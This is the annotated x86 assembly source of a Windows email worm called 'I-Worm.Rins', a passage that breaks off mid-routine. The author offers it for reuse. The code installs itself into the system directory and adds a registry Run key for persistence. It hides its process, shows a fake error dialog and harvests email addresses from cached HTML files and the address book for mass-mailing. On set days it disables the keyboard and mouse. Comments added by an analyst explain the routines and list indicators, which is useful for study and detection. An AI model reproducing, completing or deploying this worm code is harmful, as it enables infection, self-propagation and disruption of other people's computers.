;-----------------------------------------------------------------------------
;------------------------------- -----------------------------------------
;----------------------------- ---------------------------------------
;--------------------------- I-Worm Rins ------------------------------------
;----------------------------- ---------------------------------------
;------------------------------- -----------------------------------------
;-----------------------------------------------------------------------------
; After my 1st worm (I-Worm.Netav) i tried in this one to reduce the
; size(No extrn cmd) and add a little sploit(MS01-20, thanx to mar00n).
; Feel free to use everything you want in this source code.
; Thanx to Petik and Benny, i learn a lot with your worms.
; Size = 5120
; tasm32 /ml /m9 xxx
; tlink32 -Tpe -aa xxx
; upx -9 xxx
.386p
.model flat
;--------------------------- Include Zone ------------------------------------
; Win32 API constants, values as in the Windows SDK headers, declared here
; because the file is built without include files (see "No extrn cmd" in the
; header).  Used by the VirtualAlloc / CreateFileA / CreateFileMappingA /
; MapViewOfFile calls below.  FILE_MAP_WRITE, CREATE_ALWAYS and GENERIC_WRITE
; are not referenced in the portion of the file shown here.
MEM_COMMIT equ 00001000h
MEM_RESERVE equ 00002000h
PAGE_READWRITE equ 00000004h
PAGE_READONLY equ 00000002h
FILE_ATTRIBUTE_NORMAL equ 080h
OPEN_EXISTING equ 03h
FILE_SHARE_READ equ 01h
GENERIC_READ equ 80000000h
FILE_MAP_WRITE equ 00000002h
FILE_MAP_READ equ 00000004h
CREATE_ALWAYS equ 2
GENERIC_WRITE equ 40000000h
;-------------------------- Macro Zone ---------------------------------------
; @INIT_SehFrame -- push a hand-built SEH registration record whose handler
; is the inline code right after the CALL.
;   call OurSeh   pushes the address of the `mov esp,[esp+08h]` line; that
;                 address becomes the handler field of the record.
;   OurSeh        pushes the previous fs:[0] (prev-record field) and points
;                 fs:[0] at the new record (esp).
; When an exception is dispatched, the handler reloads esp from its second
; argument -- the EstablisherFrame, i.e. this record (per the Win32 handler
; calling convention) -- and then executes Instruction (in this file:
; `jmp ExitRins`), so @REM_SehFrame below can pop the record afterwards.
; Clobbers: edx.  The record must stay on the stack until @REM_SehFrame.
@INIT_SehFrame macro Instruction
local OurSeh
call OurSeh
mov esp,[esp+08h]
Instruction
OurSeh:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp
endm
; @REM_SehFrame -- undo @INIT_SehFrame: restore the previous fs:[0] and
; discard the handler-address word.  Assumes esp points at the record
; pushed by @INIT_SehFrame.  Clobbers: edx.
@REM_SehFrame macro
xor edx,edx
pop dword ptr fs:[edx]
pop edx
endm
; @pushsz -- push the address of an inline NUL-terminated string.  The CALL
; pushes its own return address, which is exactly where the `db` bytes start,
; and Str skips over them.  The string therefore lives in the code section.
@pushsz macro string
local Str
call Str
db string,0
Str: endm
; api -- indirect stdcall through a dword pointer variable.  The `_Name`
; pointers are expected to be filled in by KBase&Api (not shown in this
; excerpt); the usual stdcall clobbers (eax, ecx, edx) apply.
api macro a
call dword ptr [a]
endm
;------------------------ Constantes Zone ------------------------------------
; Build-time parameters.
; SEH            : 1 = wrap the whole body in the SEH frame (IF SEH below).
; NbEmailWanted  : collection stops once NbEmailFound reaches this count.
; EmailSize      : bytes per stored address; must stay 2^6 because the
;                  slot offset is computed with `rol edx,6`.
; EmailInMemSize : VirtualAlloc size, one slot per wanted address + 1 spare.
; NbToSend / MimeHeaderSize : used by the sending code, not shown here.
SEH equ 1 ; SEH protection
NbEmailWanted equ 80 ; Nb Email to Seek >1
EmailSize equ 64 ; Attention rol eax,6 (2^6)
EmailInMemSize equ (EmailSize*(NbEmailWanted+1)) ; For VirtualAlloc (+Security)
NbToSend equ 50 ; Send x emails per session
MimeHeaderSize equ 1024 ; Mime Header size
;-----------------------------------------------------------------------------
;--------------------------- Code Zone ---------------------------------------
;-----------------------------------------------------------------------------
.code
;-----------------------------------------------------------------------------
; Rins -- program entry point (flat script, no stack frame).
; Flow: SEH frame -> single-instance mutex -> (first run only) copy self to
; <SystemDir>\RINS.EXE, add an HKLM ...\Run value, show a decoy dialog ->
; collect addresses (EmailInMem) -> poll connectivity, running PayAnniv on
; every pass -> SendEmail once -> ExitProcess.
; ExitRins is also the SEH handler target, so any exception anywhere in the
; process terminates it via the same exit path.
; Indicators visible in this block: mutex "RinsMutex", file
; <SystemDir>\RINS.EXE, value "Rins Task" under
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run, dialog text
; "Not Enought Memory", and the banner strings after the ExitProcess call.
;-----------------------------------------------------------------------------
Rins:
pushad
IF SEH
; Handler is `jmp ExitRins`: an exception short-circuits to ExitProcess.
@INIT_SehFrame <jmp ExitRins> ; Init SEH
ENDIF
;------------------------- Get Kernel Base + Api -----------------------------
KernelBase&Api:
; KBase&Api (not shown) is expected to fill the `_Xxx` pointers that the
; `api` macro calls through; nothing below works until it has run.
call KBase&Api ; Get Kernel Base + Api
;------------------------- Check & Mark Presency -----------------------------
TryToOpenOurMutex:
; OpenMutexA(0, FALSE, "RinsMutex"): a non-zero handle means another
; instance is already running, so leave without touching disk or registry.
xor eax, eax
@pushsz 'RinsMutex' ; Mutex Name
push eax
push eax
api _OpenMutexA ; already in mem
or eax,eax
jnz ExitRins ; Yes, do nothing more
CreateOurMutex:
; CreateMutexA(NULL, FALSE, "RinsMutex"); handle kept in MutexHdl and
; closed at ExitRinsMutex.
xor eax, eax
@pushsz 'RinsMutex' ; Mutex Name
push eax ; No owner
push eax ; default security attrib
api _CreateMutexA ; create Our Mutex
mov dword ptr[MutexHdl], eax
;---------------------------- Random Init ------------------------------------
RandomInit:
; RandomNb is seeded from the tick count; its consumers are not shown here.
api _GetTickCount
mov RandomNb, eax
;---------------------- Hide Process on Win9x --------------------------------
HideProcess:
; _RegisterServiceProcess is non-null only where KBase&Api resolved it
; (author: Win9x).  When present, RegisterServiceProcess(0, 1) is called,
; which removes the process from the task list; otherwise skipped.
xor eax, eax
mov eax, dword ptr [_RegisterServiceProcess]
test eax, eax
jz GetOurPathName
push 01h
push 00h
call eax
;----------------------- Copy Worm in Sys Dir --------------------------------
GetOurPathName:
; MyPath = GetModuleFileNameA(GetModuleHandleA(NULL), MyPath, 260)
xor eax, eax
push eax
api _GetModuleHandleA ; Our Handle
push 260
push offset MyPath
push eax
api _GetModuleFileNameA ; Our Path
CreateDestPath:
; TempPath&Name = GetSystemDirectoryA() + "\RINS.EXE"  (install target)
push 260
push offset TempPath&Name
api _GetSystemDirectoryA ; System Dir
@pushsz '\RINS.EXE'
push offset TempPath&Name
api _lstrcat ; Path+Name of File to Create
CheckHowExecuted:
; lstrcmp(TempPath&Name, MyPath) == 0 => already running as the system-dir
; copy: skip the install steps (copy, Run value, decoy dialog).
push offset MyPath
push offset TempPath&Name
api _lstrcmp
test eax, eax
jz AutoRun
CreateOurFile:
; CopyFileA(MyPath, TempPath&Name, bFailIfExists = FALSE)
xor eax, eax
push eax ; Overwrite mode set
push offset TempPath&Name
push offset MyPath
api _CopyFileA ; Copy Worm in Sys Dir
;------------------------- Registry Worm -------------------------------------
RegWorm:
; SHSetValueA(HKEY_LOCAL_MACHINE (80000002h),
;             "Software\Microsoft\Windows\CurrentVersion\Run",
;             "Rins Task", REG_SZ (1), TempPath&Name, lstrlen(TempPath&Name))
; Machine-wide autostart persistence; cbData excludes the terminating NUL.
push offset TempPath&Name
api _lstrlen
push eax
push offset TempPath&Name
push 1
@pushsz "Rins Task"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api _SHSetValueA
;-------------------- First Launch Fake Message ------------------------------
FakeMessage:
; MessageBoxA(NULL, "Not Enought Memory", "Status", 1040)
; 1040 = 410h = MB_ICONINFORMATION | MB_SYSTEMMODAL.  Decoy shown only on
; the install run (the AutoRun path above bypasses it).
push 1040
@pushsz 'Status' ; maybe i should do
@pushsz 'Not Enought Memory' ; a little better
push 0
api _MessageBoxA
;----------------------- Emails address in Memory ----------------------------
AutoRun:
; Fill the VirtualAlloc'd list from the address book and cached HTML.
call EmailInMem ; Wab & Html emails in mem
;-------------------------- Spread the Worm ----------------------------------
Check_if_Connected:
; GetSystemTime(&SystemTimeData) feeds the day-of-month check in PayAnniv,
; which is re-evaluated on every pass of this polling loop.
push offset SystemTimeData
api _GetSystemTime
call PayAnniv
; InternetGetConnectedState(&IConnectedStateTemp, 0) returns a BOOL;
; `dec eax / jnz` treats anything other than exactly 1 as offline.
push 0
push offset IConnectedStateTemp
api _InternetGetConnectedState
dec eax
jnz No_internet ; No connection
call SendEmail ; Send Wab Email 1st+Rnd Email
jmp ExitRinsMutex ; Then Bye
No_internet:
; Offline: sleep 5 minutes (300000 ms) and poll again; loops until online.
push 5*60*1000 ; 5 min
api _Sleep
jmp Check_if_Connected
;----------------------------- The End ---------------------------------------
ExitRinsMutex:
; Normal exit: close the mutex handle, FreeTheMem (not shown), fall through.
push dword ptr[MutexHdl]
api _CloseHandle
call FreeTheMem
ExitRins:
; Shared exit path, also reached from the SEH handler: unwind the SEH
; record, restore registers, ExitProcess(0).
IF SEH
@REM_SehFrame ; Restore SEH
ENDIF
popad
push 0
api _ExitProcess ; Quit
; Author banner placed in the code section after ExitProcess (never
; executed); plain-text signature material.
db '::::: I-Worm.Rins by Tony :::::',0dh,0dh
db '::::: V1.2 Light Size + Sploit :::::',0dh,0dh
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;------------------------- Sub Routine Zone ----------------------------------
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;........................ Major Sub Routine ..................................
;............................ Z O N E ........................................
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;............................ Payload ........................................
;.............................................................................
; PayAnniv -- date-triggered payload.
; In:   SystemTimeData, filled by the caller's GetSystemTime.  The word at
;       offset +6 is SYSTEMTIME.wDay (day of month).
; Does: if wDay is 23 or 17 (no month or year check), runs
;       WinExec("rundll32.exe keyboard,disable", SW_HIDE=0) and then
;       WinExec("rundll32.exe mouse,disable", SW_HIDE=0), i.e. disables
;       keyboard and mouse input.  Any other day: no-op.
; Clobbers: esi, ecx, plus eax/ecx/edx from the stdcall WinExec calls.
; Analyst note: destructive payload; the two rundll32 command lines are
; distinctive detection strings.
PayAnniv:
lea esi, SystemTimeData
movzx ecx, word ptr[esi+6] ; Esi point day
cmp ecx, 23 ; Anniv
je KeyboardOut
OtherOne:
cmp ecx, 17
jne NoPay
KeyboardOut:
push 0
@pushsz 'rundll32.exe keyboard,disable'
api _WinExec
MouseOut:
push 0
@pushsz 'rundll32.exe mouse,disable'
api _WinExec
NoPay:
ret
;....................... Emails @ in Memory ..................................
;.............................................................................
; EmailInMem -- allocate the address list and fill it.
; Out: NbEmailFound = 0.
;      EmailList = VirtualAlloc(NULL, EmailInMemSize, MEM_RESERVE|MEM_COMMIT,
;                  PAGE_READWRITE): 81 slots of 64 bytes (see EmailSize).
; On allocation failure returns at once; EmailList is left as it was and
; NbEmailFound stays 0 (how callers react is not shown here).
; Then SearchWabFile_Email (not shown) and SearchHtmFile_Email (below)
; append addresses to the list.
; Clobbers: eax (+ecx/edx from the API call); whatever the two searches clobber.
EmailInMem:
mov dword ptr[NbEmailFound], 0
ReserveMem_For_EmailInMem:
xor eax,eax
push PAGE_READWRITE ; read/write page
push MEM_RESERVE or MEM_COMMIT
push EmailInMemSize
push eax ; System decide where
api _VirtualAlloc
or eax,eax
jz EmailInMemError ; Alloc Fail
mov dword ptr[EmailList], eax
EmailSeeker:
call SearchWabFile_Email ; Search Email address book
call SearchHtmFile_Email ; Search Email HTML
EmailInMemError:
ret
;........................ Find Email in HTML .................................
;.............................................................................
; Recursive Search from Internet Path for Email in Html
; SearchHtmFile_Email -- harvest mailto: addresses from the browser cache tree.
; Clear_TempPath&Name (not shown) presumably zeroes the path buffer first.
; SHGetSpecialFolderPathA(NULL, TempPath&Name, 20h, FALSE): CSIDL 20h is
; CSIDL_INTERNET_CACHE (Temporary Internet Files).  The process's current
; directory is then changed to it, RoutineToCall is set to
; SeekHtmlCurrentDir, and AllSubDirSearch (not shown) is expected to invoke
; that routine once per directory it visits.
; Side effect: the current directory of the process is changed.
SearchHtmFile_Email:
call Clear_TempPath&Name
push 00h
push 20h ; Internet Path
push offset TempPath&Name
push 00h
api _SHGetSpecialFolderPathA
push offset TempPath&Name
api _SetCurrentDirectoryA ; Selected dir = Internet Path
lea eax, SeekHtmlCurrentDir
mov dword ptr[RoutineToCall], eax
call AllSubDirSearch ; Action = SeekHtmlCurrentDir
ret
;.............. Seek Html in Current Dir
; IN: Selected Current dir
; OUT: Emails in reserved Mem
; SeekHtmlCurrentDir -- scan the current directory for "*.*htm*" files and
; parse each one for addresses.
; In:  current directory set by the caller; `search` serves as the find-data
;      buffer (SeekEmail_In_ThisHtml reads search.FileName from it).
; Out: addresses appended to EmailList by SeekEmail_In_ThisHtml.
; Registers live across the loop: esi = find handle, edi = &search; both
; survive SeekEmail_In_ThisHtml, which brackets itself with pushad/popad.
; Returns early, without opening a search, once NbEmailFound has already
; reached NbEmailWanted; also stops as soon as the count is reached mid-loop.
; Clobbers: eax, esi, edi (+ecx/edx from the API calls).
SeekHtmlCurrentDir:
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
je HtmlEmailSearchEnd ; YES...
lea edi, search
push edi
@pushsz '*.*htm*'
api _FindFirstFileA ; FindFirstFileA("*.*htm*", &search)
inc eax
; INVALID_HANDLE_VALUE (-1) + 1 == 0 => nothing matched, return.
jne SeekEmail_Html
ret
SeekEmail_Html:
dec eax
xchg eax,esi ; esi = find handle
SeekEmail_Html_Loop:
call SeekEmail_In_ThisHtml ; Parse Html 4 emails
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
je HtmlEmailSearchFin ; YES...
push edi
push esi
api _FindNextFileA ; FindNextFileA(esi, &search)
dec eax
je SeekEmail_Html_Loop ; BOOL TRUE (1) -> 0 -> next file
HtmlEmailSearchFin:
push esi
api _FindClose
HtmlEmailSearchEnd:
ret
;.............. Parse Html for emails
SeekEmail_In_ThisHtml:
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
lea eax, [search.FileName]
push eax
api _CreateFileA
inc eax
je HtmlEmailSearchEnd
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
api _CreateFileMappingA
test eax,eax
je CloseHtmlHandle
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
api _MapViewOfFile
test eax,eax
je CloseHtml_MapHandle
xchg eax,esi
mov [maphandlemail],esi
mov [esi_save],esi
push 0
push ebx
api _GetFileSize
xchg eax,ecx
jecxz CloseHtml_MapViewHandle
inc ecx
jz CloseHtml_MapViewHandle ; GetFileSize Error ?
dec ecx
FixBugOverflow:
sub ecx, 8
cmp ecx, 0
jl CloseHtml_MapViewHandle
SeekMailToStr:
mov esi,[esi_save]
call MTStr
db 'mailto:'
MTStr:
pop edi
ScanFor_MailTo:
pushad
push 7
pop ecx
rep cmpsb ; search for "mailto:"
popad ; string
je MailToFound_CheckEmail ; check the mail address
inc esi
dec ecx
jnz ScanFor_MailTo
CloseHtml_MapViewHandle:
push [maphandlemail]
api _UnmapViewOfFile
CloseHtml_MapHandle:
push ebp
api _CloseHandle
CloseHtmlHandle:
push ebx
api _CloseHandle
popad
ret
MailToFound_CheckEmail:
inc esi
mov [esi_save],esi
dec esi
mov edi, dword ptr [EmailList] ; STORE THE EMAIL in the
mov edx, dword ptr [NbEmailFound]
rol edx, 6 ; 64 = email size stockage
add edi, edx ; goto next place
mov [EmailCurrentPos], edi
xor edx,edx
add esi,7
push edi ; mail address
NextChar:
lodsb
cmp al, ' '
je SkipChar
cmp al, '"' ; eMail End ?
je EndChar
cmp al, '?' ; eMail End ?
je EndChar
cmp al, '>' ; eMail End ?
je EndChar
cmp al, '<' ; eMail End ?
je EndChar
cmp al, ']' ; eMail End ?
je EndChar
cmp al, '''' ; eMail End ?
je EndChar
cmp al, '@' ; Valid email ?
jne CopyChar